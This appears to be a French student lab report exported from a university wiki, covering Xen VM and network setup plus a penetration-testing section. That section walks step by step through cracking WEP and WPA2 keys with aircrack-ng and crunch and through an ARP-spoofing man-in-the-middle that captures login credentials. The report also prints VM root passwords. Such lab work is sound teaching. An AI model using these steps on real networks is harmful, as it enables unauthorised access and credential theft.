&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54010</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54010"/>
				<updated>2020-11-27T17:02:07Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Configuration de la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
